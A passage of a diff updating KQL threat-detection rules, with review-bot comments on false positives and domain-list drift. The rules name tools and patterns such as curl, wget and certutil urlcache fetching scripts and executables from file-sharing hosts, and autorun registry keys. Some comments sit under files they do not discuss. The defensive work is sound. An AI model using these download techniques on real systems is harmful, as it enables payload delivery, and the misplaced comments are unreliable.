"Microsoft-Windows-TerminalServices-RemoteConnectionManager" or ProcessCommandLine contains "Microsoft-Windows-Windows Defender" or ProcessCommandLine contains "PowerShellCore" or ProcessCommandLine contains "Security" or ProcessCommandLine contains "Windows PowerShell")) and ((ProcessCommandLine contains "Select" and ProcessCommandLine contains "Win32_NTLogEvent") or ((ProcessCommandLine contains " qe " or ProcessCommandLine contains " query-events ") and (FolderPath endswith "\\wevtutil.exe" or ProcessVersionInfoOriginalFileName =~ "wevtutil.exe")) or (ProcessCommandLine contains " ntevent" and (FolderPath endswith "\\wmic.exe" or ProcessVersionInfoOriginalFileName =~ "wmic.exe")) or (ProcessCommandLine contains "Get-WinEvent " 
or ProcessCommandLine contains "get-eventlog "))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/renamed_office_binary_execution.kql b/KQL/rules/windows/process_creation/renamed_office_binary_execution.kql
index 97294b8a..0a07c0bf 100644
--- a/KQL/rules/windows/process_creation/renamed_office_binary_execution.kql
+++ b/KQL/rules/windows/process_creation/renamed_office_binary_execution.kql
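Review bot: The `EventCode=`/`EventIdentifier=` branches that the new `| where` line adds for IDs 21, 22 and 1149 are two independent substring tests, so `(ProcessCommandLine contains "EventCode=" and ProcessCommandLine contains "21")` fires on any event-log query whose command line has the digits 21 anywhere — `EventCode=4621`, a `1021` in a path, a date — and with two-digit IDs this pairing is likely to dominate the rule's hits. The pre-existing 25 and 462 branches have the same shape, so this looks like the backend's literal rendering of a Sigma `contains|all` rather than an intentional match. If the backend can emit it, anchoring the ID to its key is closer to the intent, e.g. replacing the paired tests with `ProcessCommandLine matches regex "EventCode\\s*=\\s*\\W?(21|22|25|462|1149|4778)\\b"` (and the same for `EventIdentifier`), in the doubled-backslash form the wget rule in this commit already uses. The `| where` expression is the whole hunk body, so nothing outside it needs to change.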
@@ -4,7 +4,7 @@
 // Level: high
 // Description: Detects the execution of a renamed office binary
 // MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion
+// Tags: attack.defense-evasion, attack.t1036.003
 DeviceProcessEvents
-| where ((ProcessVersionInfoOriginalFileName in~ ("Excel.exe", "MSACCESS.EXE", "MSPUB.EXE", "OneNote.exe", "OneNoteM.exe", "OUTLOOK.EXE", "POWERPNT.EXE", "WinWord.exe")) or (ProcessVersionInfoFileDescription in~ ("Microsoft Access", "Microsoft Excel", "Microsoft OneNote", "Microsoft Outlook", "Microsoft PowerPoint", "Microsoft Publisher", "Microsoft Word", "Sent to OneNote Tool"))) and (not((FolderPath endswith "\\EXCEL.exe" or FolderPath endswith "\\excelcnv.exe" or FolderPath endswith "\\MSACCESS.exe" or FolderPath endswith "\\MSPUB.EXE" or FolderPath endswith "\\ONENOTE.EXE" or FolderPath endswith "\\ONENOTEM.EXE" or FolderPath endswith "\\OUTLOOK.EXE" or FolderPath endswith "\\POWERPNT.EXE" or FolderPath endswith "\\WINWORD.exe")))
\ No newline at end of file
+| where ((ProcessVersionInfoOriginalFileName in~ ("Excel.exe", "MSACCESS.EXE", "MSPUB.EXE", "OneNote.exe", "OneNoteM.exe", "OUTLOOK.EXE", "POWERPNT.EXE", "WinWord.exe", "Olk.exe")) or (ProcessVersionInfoFileDescription in~ ("Microsoft Access", "Microsoft Excel", "Microsoft OneNote", "Microsoft Outlook", "Microsoft PowerPoint", "Microsoft Publisher", "Microsoft Word", "Sent to OneNote Tool"))) and (not((FolderPath endswith "\\EXCEL.exe" or FolderPath endswith "\\excelcnv.exe" or FolderPath endswith "\\MSACCESS.exe" or FolderPath endswith "\\MSPUB.EXE" or FolderPath endswith "\\ONENOTE.EXE" or FolderPath endswith "\\ONENOTEM.EXE" or FolderPath endswith "\\OUTLOOK.EXE" or FolderPath endswith "\\POWERPNT.EXE" or FolderPath endswith "\\WINWORD.exe" or FolderPath endswith "\\OLK.EXE")))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/suspicious_file_download_from_file_sharing_domain_via_curl_exe.kql b/KQL/rules/windows/process_creation/suspicious_file_download_from_file_sharing_domain_via_curl_exe.kql
index 78285879..f07667f3 100644
--- a/KQL/rules/windows/process_creation/suspicious_file_download_from_file_sharing_domain_via_curl_exe.kql
+++ b/KQL/rules/windows/process_creation/suspicious_file_download_from_file_sharing_domain_via_curl_exe.kql
@@ -7,4 +7,4 @@
 // Tags: attack.execution
 DeviceProcessEvents
-| where (ProcessCommandLine endswith ".ps1" or ProcessCommandLine endswith ".ps1'" or ProcessCommandLine endswith ".ps1\"" or ProcessCommandLine endswith ".dat" or ProcessCommandLine endswith ".dat'" or ProcessCommandLine endswith ".dat\"" or ProcessCommandLine endswith ".msi" or ProcessCommandLine endswith ".msi'" or ProcessCommandLine endswith ".msi\"" or ProcessCommandLine endswith ".bat" or ProcessCommandLine endswith ".bat'" or ProcessCommandLine endswith ".bat\"" or ProcessCommandLine endswith ".exe" or ProcessCommandLine endswith ".exe'" or ProcessCommandLine endswith ".exe\"" or ProcessCommandLine endswith ".vbs" or ProcessCommandLine endswith ".vbs'" or ProcessCommandLine endswith ".vbs\"" or ProcessCommandLine endswith ".vbe" or ProcessCommandLine endswith ".vbe'" or ProcessCommandLine endswith ".vbe\"" or ProcessCommandLine endswith ".hta" or ProcessCommandLine endswith ".hta'" or ProcessCommandLine endswith ".hta\"" or ProcessCommandLine endswith ".dll" or ProcessCommandLine endswith ".dll'" or ProcessCommandLine endswith ".dll\"" or ProcessCommandLine endswith ".psm1" or ProcessCommandLine endswith ".psm1'" or ProcessCommandLine endswith ".psm1\"") and (ProcessCommandLine contains " -O" or ProcessCommandLine contains "--remote-name" or ProcessCommandLine contains "--output") and ProcessCommandLine contains "http" and (FolderPath endswith "\\curl.exe" or ProcessVersionInfoOriginalFileName =~ "curl.exe") and (ProcessCommandLine contains ".githubusercontent.com" or ProcessCommandLine contains "anonfiles.com" or ProcessCommandLine contains "cdn.discordapp.com" or ProcessCommandLine contains "ddns.net" or ProcessCommandLine contains "dl.dropboxusercontent.com" or ProcessCommandLine contains "ghostbin.co" or ProcessCommandLine contains "glitch.me" or ProcessCommandLine contains "gofile.io" or ProcessCommandLine contains "hastebin.com" or ProcessCommandLine contains "mediafire.com" or 
ProcessCommandLine contains "mega.nz" or ProcessCommandLine contains "onrender.com" or ProcessCommandLine contains "pages.dev" or ProcessCommandLine contains "paste.ee" or ProcessCommandLine contains "pastebin.com" or ProcessCommandLine contains "pastebin.pl" or ProcessCommandLine contains "pastetext.net" or ProcessCommandLine contains "pixeldrain.com" or ProcessCommandLine contains "privatlab.com" or ProcessCommandLine contains "privatlab.net" or ProcessCommandLine contains "send.exploit.in" or ProcessCommandLine contains "sendspace.com" or ProcessCommandLine contains "storage.googleapis.com" or ProcessCommandLine contains "storjshare.io" or ProcessCommandLine contains "supabase.co" or ProcessCommandLine contains "temp.sh" or ProcessCommandLine contains "transfer.sh" or ProcessCommandLine contains "trycloudflare.com" or ProcessCommandLine contains "ufile.io" or ProcessCommandLine contains "w3spaces.com" or ProcessCommandLine contains "workers.dev")
\ No newline at end of file
+| where (ProcessCommandLine endswith ".ps1" or ProcessCommandLine endswith ".ps1'" or ProcessCommandLine endswith ".ps1\"" or ProcessCommandLine endswith ".dat" or ProcessCommandLine endswith ".dat'" or ProcessCommandLine endswith ".dat\"" or ProcessCommandLine endswith ".msi" or ProcessCommandLine endswith ".msi'" or ProcessCommandLine endswith ".msi\"" or ProcessCommandLine endswith ".bat" or ProcessCommandLine endswith ".bat'" or ProcessCommandLine endswith ".bat\"" or ProcessCommandLine endswith ".exe" or ProcessCommandLine endswith ".exe'" or ProcessCommandLine endswith ".exe\"" or ProcessCommandLine endswith ".vbs" or ProcessCommandLine endswith ".vbs'" or ProcessCommandLine endswith ".vbs\"" or ProcessCommandLine endswith ".vbe" or ProcessCommandLine endswith ".vbe'" or ProcessCommandLine endswith ".vbe\"" or ProcessCommandLine endswith ".hta" or ProcessCommandLine endswith ".hta'" or ProcessCommandLine endswith ".hta\"" or ProcessCommandLine endswith ".dll" or ProcessCommandLine 
endswith ".dll'" or ProcessCommandLine endswith ".dll\"" or ProcessCommandLine endswith ".psm1" or ProcessCommandLine endswith ".psm1'" or ProcessCommandLine endswith ".psm1\"") and (ProcessCommandLine contains " -O" or ProcessCommandLine contains "--remote-name" or ProcessCommandLine contains "--output") and ProcessCommandLine contains "http" and (FolderPath endswith "\\curl.exe" or ProcessVersionInfoOriginalFileName =~ "curl.exe") and (ProcessCommandLine contains ".githubusercontent.com" or ProcessCommandLine contains "anonfiles.com" or ProcessCommandLine contains "cdn.discordapp.com" or ProcessCommandLine contains "ddns.net" or ProcessCommandLine contains "dl.dropboxusercontent.com" or ProcessCommandLine contains "ghostbin.co" or ProcessCommandLine contains "github.com" or ProcessCommandLine contains "glitch.me" or ProcessCommandLine contains "gofile.io" or ProcessCommandLine contains "hastebin.com" or ProcessCommandLine contains "mediafire.com" or ProcessCommandLine contains "mega.nz" or ProcessCommandLine contains "onrender.com" or ProcessCommandLine contains "pages.dev" or ProcessCommandLine contains "paste.ee" or ProcessCommandLine contains "pastebin.com" or ProcessCommandLine contains "pastebin.pl" or ProcessCommandLine contains "pastetext.net" or ProcessCommandLine contains "pixeldrain.com" or ProcessCommandLine contains "privatlab.com" or ProcessCommandLine contains "privatlab.net" or ProcessCommandLine contains "send.exploit.in" or ProcessCommandLine contains "sendspace.com" or ProcessCommandLine contains "storage.googleapis.com" or ProcessCommandLine contains "storjshare.io" or ProcessCommandLine contains "supabase.co" or ProcessCommandLine contains "temp.sh" or ProcessCommandLine contains "transfer.sh" or ProcessCommandLine contains "trycloudflare.com" or ProcessCommandLine contains "ufile.io" or ProcessCommandLine contains "w3spaces.com" or ProcessCommandLine contains "workers.dev")
\ No newline at end of file
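Review bot: `ProcessCommandLine contains "github.com"` on the new `| where` line is far broader than the `.githubusercontent.com` entry it sits beside: curl pulls of release assets and installers from github.com are routine on developer and CI hosts, so this one domain is likely to account for most of the rule's new hits, and the rule header carries no false-positive entry for it. Either narrow the match — e.g. `ProcessCommandLine contains "github.com/" and ProcessCommandLine contains "/releases/download/"`, if release assets are the concern — or document the accepted noise with a header line such as `// - Developer tooling and CI pipelines fetching release assets from github.com via curl` under `// False Positives:`. The wget.exe and certutil.exe hunks below add the same `github.com` entry and this note applies to them as well.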
diff --git a/KQL/rules/windows/process_creation/suspicious_file_download_from_file_sharing_domain_via_wget_exe.kql b/KQL/rules/windows/process_creation/suspicious_file_download_from_file_sharing_domain_via_wget_exe.kql
index 38705676..74c057a6 100644
--- a/KQL/rules/windows/process_creation/suspicious_file_download_from_file_sharing_domain_via_wget_exe.kql
+++ b/KQL/rules/windows/process_creation/suspicious_file_download_from_file_sharing_domain_via_wget_exe.kql
@@ -7,4 +7,4 @@
 // Tags: attack.execution
 DeviceProcessEvents
-| where (ProcessCommandLine endswith ".ps1" or ProcessCommandLine endswith ".ps1'" or ProcessCommandLine endswith ".ps1\"" or ProcessCommandLine endswith ".dat" or ProcessCommandLine endswith ".dat'" or ProcessCommandLine endswith ".dat\"" or ProcessCommandLine endswith ".msi" or ProcessCommandLine endswith ".msi'" or ProcessCommandLine endswith ".msi\"" or ProcessCommandLine endswith ".bat" or ProcessCommandLine endswith ".bat'" or ProcessCommandLine endswith ".bat\"" or ProcessCommandLine endswith ".exe" or ProcessCommandLine endswith ".exe'" or ProcessCommandLine endswith ".exe\"" or ProcessCommandLine endswith ".vbs" or ProcessCommandLine endswith ".vbs'" or ProcessCommandLine endswith ".vbs\"" or ProcessCommandLine endswith ".vbe" or ProcessCommandLine endswith ".vbe'" or ProcessCommandLine endswith ".vbe\"" or ProcessCommandLine endswith ".hta" or ProcessCommandLine endswith ".hta'" or ProcessCommandLine endswith ".hta\"" or ProcessCommandLine endswith ".dll" or ProcessCommandLine endswith ".dll'" or ProcessCommandLine endswith ".dll\"" or ProcessCommandLine endswith ".psm1" or ProcessCommandLine endswith ".psm1'" or ProcessCommandLine endswith ".psm1\"") and (ProcessCommandLine matches regex "\\s-O\\s" or ProcessCommandLine contains "--output-document") and ProcessCommandLine contains "http" and (FolderPath endswith "\\wget.exe" or ProcessVersionInfoOriginalFileName =~ "wget.exe") and (ProcessCommandLine contains ".githubusercontent.com" or ProcessCommandLine contains "anonfiles.com" or ProcessCommandLine contains "cdn.discordapp.com" or ProcessCommandLine contains "ddns.net" or ProcessCommandLine contains "dl.dropboxusercontent.com" or ProcessCommandLine contains "ghostbin.co" or ProcessCommandLine contains "glitch.me" or ProcessCommandLine contains "gofile.io" or ProcessCommandLine contains "hastebin.com" or ProcessCommandLine contains "mediafire.com" or ProcessCommandLine contains "mega.nz" or 
ProcessCommandLine contains "onrender.com" or ProcessCommandLine contains "pages.dev" or ProcessCommandLine contains "paste.ee" or ProcessCommandLine contains "pastebin.com" or ProcessCommandLine contains "pastebin.pl" or ProcessCommandLine contains "pastetext.net" or ProcessCommandLine contains "pixeldrain.com" or ProcessCommandLine contains "privatlab.com" or ProcessCommandLine contains "privatlab.net" or ProcessCommandLine contains "send.exploit.in" or ProcessCommandLine contains "sendspace.com" or ProcessCommandLine contains "storage.googleapis.com" or ProcessCommandLine contains "storjshare.io" or ProcessCommandLine contains "supabase.co" or ProcessCommandLine contains "temp.sh" or ProcessCommandLine contains "transfer.sh" or ProcessCommandLine contains "trycloudflare.com" or ProcessCommandLine contains "ufile.io" or ProcessCommandLine contains "w3spaces.com" or ProcessCommandLine contains "workers.dev")
\ No newline at end of file
+| where (ProcessCommandLine endswith ".ps1" or ProcessCommandLine endswith ".ps1'" or ProcessCommandLine endswith ".ps1\"" or ProcessCommandLine endswith ".dat" or ProcessCommandLine endswith ".dat'" or ProcessCommandLine endswith ".dat\"" or ProcessCommandLine endswith ".msi" or ProcessCommandLine endswith ".msi'" or ProcessCommandLine endswith ".msi\"" or ProcessCommandLine endswith ".bat" or ProcessCommandLine endswith ".bat'" or ProcessCommandLine endswith ".bat\"" or ProcessCommandLine endswith ".exe" or ProcessCommandLine endswith ".exe'" or ProcessCommandLine endswith ".exe\"" or ProcessCommandLine endswith ".vbs" or ProcessCommandLine endswith ".vbs'" or ProcessCommandLine endswith ".vbs\"" or ProcessCommandLine endswith ".vbe" or ProcessCommandLine endswith ".vbe'" or ProcessCommandLine endswith ".vbe\"" or ProcessCommandLine endswith ".hta" or ProcessCommandLine endswith ".hta'" or ProcessCommandLine endswith ".hta\"" or ProcessCommandLine endswith ".dll" or ProcessCommandLine endswith ".dll'" or ProcessCommandLine 
endswith ".dll\"" or ProcessCommandLine endswith ".psm1" or ProcessCommandLine endswith ".psm1'" or ProcessCommandLine endswith ".psm1\"") and (ProcessCommandLine matches regex "\\s-O\\s" or ProcessCommandLine contains "--output-document") and ProcessCommandLine contains "http" and (FolderPath endswith "\\wget.exe" or ProcessVersionInfoOriginalFileName =~ "wget.exe") and (ProcessCommandLine contains ".githubusercontent.com" or ProcessCommandLine contains "anonfiles.com" or ProcessCommandLine contains "cdn.discordapp.com" or ProcessCommandLine contains "ddns.net" or ProcessCommandLine contains "dl.dropboxusercontent.com" or ProcessCommandLine contains "ghostbin.co" or ProcessCommandLine contains "github.com" or ProcessCommandLine contains "glitch.me" or ProcessCommandLine contains "gofile.io" or ProcessCommandLine contains "hastebin.com" or ProcessCommandLine contains "mediafire.com" or ProcessCommandLine contains "mega.nz" or ProcessCommandLine contains "onrender.com" or ProcessCommandLine contains "pages.dev" or ProcessCommandLine contains "paste.ee" or ProcessCommandLine contains "pastebin.com" or ProcessCommandLine contains "pastebin.pl" or ProcessCommandLine contains "pastetext.net" or ProcessCommandLine contains "pixeldrain.com" or ProcessCommandLine contains "privatlab.com" or ProcessCommandLine contains "privatlab.net" or ProcessCommandLine contains "send.exploit.in" or ProcessCommandLine contains "sendspace.com" or ProcessCommandLine contains "storage.googleapis.com" or ProcessCommandLine contains "storjshare.io" or ProcessCommandLine contains "supabase.co" or ProcessCommandLine contains "temp.sh" or ProcessCommandLine contains "transfer.sh" or ProcessCommandLine contains "trycloudflare.com" or ProcessCommandLine contains "ufile.io" or ProcessCommandLine contains "w3spaces.com" or ProcessCommandLine contains "workers.dev")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/suspicious_file_downloaded_from_file_sharing_website_via_certutil_exe.kql b/KQL/rules/windows/process_creation/suspicious_file_downloaded_from_file_sharing_website_via_certutil_exe.kql
index efe3691e..37babf2c 100644
--- a/KQL/rules/windows/process_creation/suspicious_file_downloaded_from_file_sharing_website_via_certutil_exe.kql
+++ b/KQL/rules/windows/process_creation/suspicious_file_downloaded_from_file_sharing_website_via_certutil_exe.kql
@@ -7,4 +7,4 @@
 // Tags: attack.defense-evasion, attack.t1027, attack.command-and-control, attack.t1105
 DeviceProcessEvents
-| where (ProcessCommandLine contains "urlcache " or ProcessCommandLine contains "verifyctl " or ProcessCommandLine contains "URL ") and (ProcessCommandLine contains ".githubusercontent.com" or ProcessCommandLine contains "anonfiles.com" or ProcessCommandLine contains "cdn.discordapp.com" or ProcessCommandLine contains "ddns.net" or ProcessCommandLine contains "dl.dropboxusercontent.com" or ProcessCommandLine contains "ghostbin.co" or ProcessCommandLine contains "glitch.me" or ProcessCommandLine contains "gofile.io" or ProcessCommandLine contains "hastebin.com" or ProcessCommandLine contains "mediafire.com" or ProcessCommandLine contains "mega.nz" or ProcessCommandLine contains "onrender.com" or ProcessCommandLine contains "pages.dev" or ProcessCommandLine contains "paste.ee" or ProcessCommandLine contains "pastebin.com" or ProcessCommandLine contains "pastebin.pl" or ProcessCommandLine contains "pastetext.net" or ProcessCommandLine contains "privatlab.com" or ProcessCommandLine contains "privatlab.net" or ProcessCommandLine contains "send.exploit.in" or ProcessCommandLine contains "sendspace.com" or ProcessCommandLine contains "storage.googleapis.com" or ProcessCommandLine contains "storjshare.io" or ProcessCommandLine contains "supabase.co" or ProcessCommandLine contains "temp.sh" or ProcessCommandLine contains "transfer.sh" or ProcessCommandLine contains "trycloudflare.com" or ProcessCommandLine contains "ufile.io" or ProcessCommandLine contains "w3spaces.com" or ProcessCommandLine contains "workers.dev") and (FolderPath endswith "\\certutil.exe" or ProcessVersionInfoOriginalFileName =~ "CertUtil.exe")
\ No newline at end of file
+| where (ProcessCommandLine contains "urlcache " or ProcessCommandLine contains "verifyctl " or ProcessCommandLine contains "URL ") and (ProcessCommandLine contains ".githubusercontent.com" or ProcessCommandLine 
contains "anonfiles.com" or ProcessCommandLine contains "cdn.discordapp.com" or ProcessCommandLine contains "ddns.net" or ProcessCommandLine contains "dl.dropboxusercontent.com" or ProcessCommandLine contains "ghostbin.co" or ProcessCommandLine contains "github.com" or ProcessCommandLine contains "glitch.me" or ProcessCommandLine contains "gofile.io" or ProcessCommandLine contains "hastebin.com" or ProcessCommandLine contains "mediafire.com" or ProcessCommandLine contains "mega.nz" or ProcessCommandLine contains "onrender.com" or ProcessCommandLine contains "pages.dev" or ProcessCommandLine contains "paste.ee" or ProcessCommandLine contains "pastebin.com" or ProcessCommandLine contains "pastebin.pl" or ProcessCommandLine contains "pastetext.net" or ProcessCommandLine contains "privatlab.com" or ProcessCommandLine contains "privatlab.net" or ProcessCommandLine contains "send.exploit.in" or ProcessCommandLine contains "sendspace.com" or ProcessCommandLine contains "storage.googleapis.com" or ProcessCommandLine contains "storjshare.io" or ProcessCommandLine contains "supabase.co" or ProcessCommandLine contains "temp.sh" or ProcessCommandLine contains "transfer.sh" or ProcessCommandLine contains "trycloudflare.com" or ProcessCommandLine contains "ufile.io" or ProcessCommandLine contains "w3spaces.com" or ProcessCommandLine contains "workers.dev") and (FolderPath endswith "\\certutil.exe" or ProcessVersionInfoOriginalFileName =~ "CertUtil.exe")
\ No newline at end of file
diff --git a/KQL/rules/windows/registry/registry_set/wow6432node_currentversion_autorun_keys_modification.kql b/KQL/rules/windows/registry/registry_set/wow6432node_currentversion_autorun_keys_modification.kql
index da42fd2d..fc54df88 100644
--- a/KQL/rules/windows/registry/registry_set/wow6432node_currentversion_autorun_keys_modification.kql
+++ b/KQL/rules/windows/registry/registry_set/wow6432node_currentversion_autorun_keys_modification.kql
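Review bot: The domain list on the new `| where` line has drifted from the curl.exe and wget.exe lists changed in this same commit: both of those contain `pixeldrain.com` and this one does not, even though all three receive the identical `github.com` addition here. If the three rules are meant to share one file-sharing-domain list, the divergence should be resolved at the source so a domain added to one rule cannot silently miss another; if it is intentional, a header line such as `// NOTE: domain list deliberately narrower than the curl/wget variants` would save the next reader from "fixing" it. The breadth concern about `github.com` raised on the curl hunk above applies to this line unchanged; the `| where` expression is the whole hunk.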
@@ -10,4 +10,4 @@ // - Legitimate administrator sets up autorun keys for legitimate reason DeviceRegistryEvents -| where (RegistryKey contains "\\SOFTWARE\\Wow6432Node\\Microsoft\\Windows\\CurrentVersion" and (RegistryKey contains "\\ShellServiceObjectDelayLoad" or RegistryKey endswith "\\Run*" or RegistryKey endswith "\\RunOnce*" or RegistryKey endswith "\\RunOnceEx*" or RegistryKey endswith "\\RunServices*" or RegistryKey endswith "\\RunServicesOnce*" or RegistryKey contains "\\Explorer\\ShellServiceObjects" or RegistryKey contains "\\Explorer\\ShellIconOverlayIdentifiers" or RegistryKey contains "\\Explorer\\ShellExecuteHooks" or RegistryKey contains "\\Explorer\\SharedTaskScheduler" or RegistryKey contains "\\Explorer\\Browser Helper Objects")) and (not(((InitiatingProcessFolderPath contains "C:\\Program Files (x86)\\Microsoft\\EdgeUpdate\\Install\\{" and InitiatingProcessFolderPath contains "\\setup.exe") or RegistryValueData =~ "(Empty)" or RegistryValueData startswith "\"C:\\ProgramData\\Package Cache\\{d21a4f20-968a-4b0c-bf04-a38da5f06e41}\\windowsdesktop-runtime-" or (InitiatingProcessFolderPath =~ "C:\\WINDOWS\\system32\\msiexec.exe" and RegistryKey endswith "\\SOFTWARE\\Wow6432Node\\Microsoft\\Windows\\CurrentVersion\\Run*") or (InitiatingProcessFolderPath startswith "C:\\Windows\\Installer\\MSI" and RegistryKey contains "\\Explorer\\Browser Helper Objects") or (RegistryValueData endswith " /burn.runonce" and (InitiatingProcessFolderPath contains "\\winsdksetup.exe" or InitiatingProcessFolderPath contains "\\windowsdesktop-runtime-" or InitiatingProcessFolderPath contains "\\AspNetCoreSharedFrameworkBundle-") and (InitiatingProcessFolderPath startswith "C:\\ProgramData\\Package Cache" or InitiatingProcessFolderPath startswith "C:\\Windows\\Temp\\")) or (RegistryValueData endswith "}\\VC_redist.x64.exe\" /burn.runonce" and InitiatingProcessFolderPath endswith "\\VC_redist.x64.exe")))) and (not(((RegistryValueData endswith "instup.exe\" /instop:repair 
/wait" and InitiatingProcessFolderPath endswith "\\instup.exe" and RegistryKey endswith "\\SOFTWARE\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\AvRepair") or ((RegistryValueData in~ ("{472083B1-C522-11CF-8763-00608CC02F24}", "{472083B0-C522-11CF-8763-00608CC02F24}")) and InitiatingProcessFolderPath endswith "\\instup.exe" and (RegistryKey endswith "\\SOFTWARE\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\Explorer\\ShellIconOverlayIdentifiers\\00avg\\(Default)" or RegistryKey endswith "\\SOFTWARE\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\Explorer\\ShellIconOverlayIdentifiers\\00asw\\(Default)")) or (RegistryValueData endswith "\\Avira.OE.Setup.Bundle.exe\" /burn.runonce" and InitiatingProcessFolderPath endswith "\\Avira.OE.Setup.Bundle.exe") or (RegistryValueData endswith "Discord.exe --checkInstall" and RegistryKey endswith "\\SOFTWARE\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\Run\\Discord") or (RegistryValueData endswith ".exe\" /burn.runonce" and RegistryValueData startswith "\"C:\\ProgramData\\Package Cache\\" and InitiatingProcessFolderPath contains "\\windowsdesktop-runtime-" and (RegistryKey endswith "\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\{e2d1ae32-dd1d-4ad7-a298-10e42e7840fc}" or RegistryKey endswith "\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\{7037b699-7382-448c-89a7-4765961d2537}")) or (RegistryValueData endswith "-A251-47B7-93E1-CDD82E34AF8B}" or RegistryValueData =~ "grpconv -o" or (RegistryValueData contains "C:\\Program Files" and RegistryValueData contains "\\Dropbox\\Client\\Dropbox.exe" and RegistryValueData contains " /systemstartup")) or RegistryKey endswith "\\Explorer\\Browser Helper Objects\\{92EF2EAD-A7CE-4424-B0DB-499CF856608E}\\NoExplorer" or (InitiatingProcessFolderPath =~ "C:\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\OfficeClickToRun.exe" and RegistryKey endswith "\\Office\\ClickToRun\\REGISTRY\\MACHINE\\Software\\Wow6432Node*") or 
((InitiatingProcessFolderPath in~ ("C:\\Program Files\\Microsoft Office\\root\\integration\\integrator.exe", "C:\\Program Files (x86)\\Microsoft Office\\root\\integration\\integrator.exe")) and RegistryKey endswith "\\Explorer\\Browser Helper Objects\\{31D09BA0-12F5-4CCE-BE8A-2923E76605DA}*") or (InitiatingProcessFolderPath endswith "\\OfficeClickToRun.exe" and (InitiatingProcessFolderPath startswith "C:\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\" or InitiatingProcessFolderPath startswith "C:\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\Updates\\"))))) \ No newline at end of file +| where (RegistryKey contains "\\SOFTWARE\\Wow6432Node\\Microsoft\\Windows\\CurrentVersion" and (RegistryKey contains "\\ShellServiceObjectDelayLoad" or RegistryKey endswith "\\Run*" or RegistryKey endswith "\\RunOnce*" or RegistryKey endswith "\\RunOnceEx*" or RegistryKey endswith "\\RunServices*" or RegistryKey endswith "\\RunServicesOnce*" or RegistryKey contains "\\Explorer\\ShellServiceObjects" or RegistryKey contains "\\Explorer\\ShellIconOverlayIdentifiers" or RegistryKey contains "\\Explorer\\ShellExecuteHooks" or RegistryKey contains "\\Explorer\\SharedTaskScheduler" or RegistryKey contains "\\Explorer\\Browser Helper Objects")) and (not(((InitiatingProcessFolderPath contains "C:\\Program Files (x86)\\Microsoft\\EdgeUpdate\\Install\\{" and InitiatingProcessFolderPath contains "\\setup.exe") or RegistryValueData =~ "(Empty)" or RegistryValueData startswith "\"C:\\ProgramData\\Package Cache\\{d21a4f20-968a-4b0c-bf04-a38da5f06e41}\\windowsdesktop-runtime-" or (InitiatingProcessFolderPath =~ "C:\\WINDOWS\\system32\\msiexec.exe" and RegistryKey endswith "\\SOFTWARE\\Wow6432Node\\Microsoft\\Windows\\CurrentVersion\\Run*") or isnull(RegistryValueData) or (InitiatingProcessFolderPath startswith "C:\\Windows\\Installer\\MSI" and RegistryKey contains "\\Explorer\\Browser Helper Objects") or (RegistryValueData endswith " /burn.runonce" and 
(InitiatingProcessFolderPath contains "\\winsdksetup.exe" or InitiatingProcessFolderPath contains "\\windowsdesktop-runtime-" or InitiatingProcessFolderPath contains "\\AspNetCoreSharedFrameworkBundle-") and (InitiatingProcessFolderPath startswith "C:\\ProgramData\\Package Cache" or InitiatingProcessFolderPath startswith "C:\\Windows\\Temp\\")) or (RegistryValueData endswith "}\\VC_redist.x64.exe\" /burn.runonce" and InitiatingProcessFolderPath endswith "\\VC_redist.x64.exe")))) and (not(((RegistryValueData endswith "instup.exe\" /instop:repair /wait" and InitiatingProcessFolderPath endswith "\\instup.exe" and RegistryKey endswith "\\SOFTWARE\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\AvRepair") or ((RegistryValueData in~ ("{472083B1-C522-11CF-8763-00608CC02F24}", "{472083B0-C522-11CF-8763-00608CC02F24}")) and InitiatingProcessFolderPath endswith "\\instup.exe" and (RegistryKey endswith "\\SOFTWARE\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\Explorer\\ShellIconOverlayIdentifiers\\00avg\\(Default)" or RegistryKey endswith "\\SOFTWARE\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\Explorer\\ShellIconOverlayIdentifiers\\00asw\\(Default)")) or (RegistryValueData endswith "\\Avira.OE.Setup.Bundle.exe\" /burn.runonce" and InitiatingProcessFolderPath endswith "\\Avira.OE.Setup.Bundle.exe") or (RegistryValueData endswith "Discord.exe --checkInstall" and RegistryKey endswith "\\SOFTWARE\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\Run\\Discord") or (RegistryValueData endswith ".exe\" /burn.runonce" and RegistryValueData startswith "\"C:\\ProgramData\\Package Cache\\" and InitiatingProcessFolderPath contains "\\windowsdesktop-runtime-" and (RegistryKey endswith "\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\{e2d1ae32-dd1d-4ad7-a298-10e42e7840fc}" or RegistryKey endswith "\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\{7037b699-7382-448c-89a7-4765961d2537}")) or (RegistryValueData endswith 
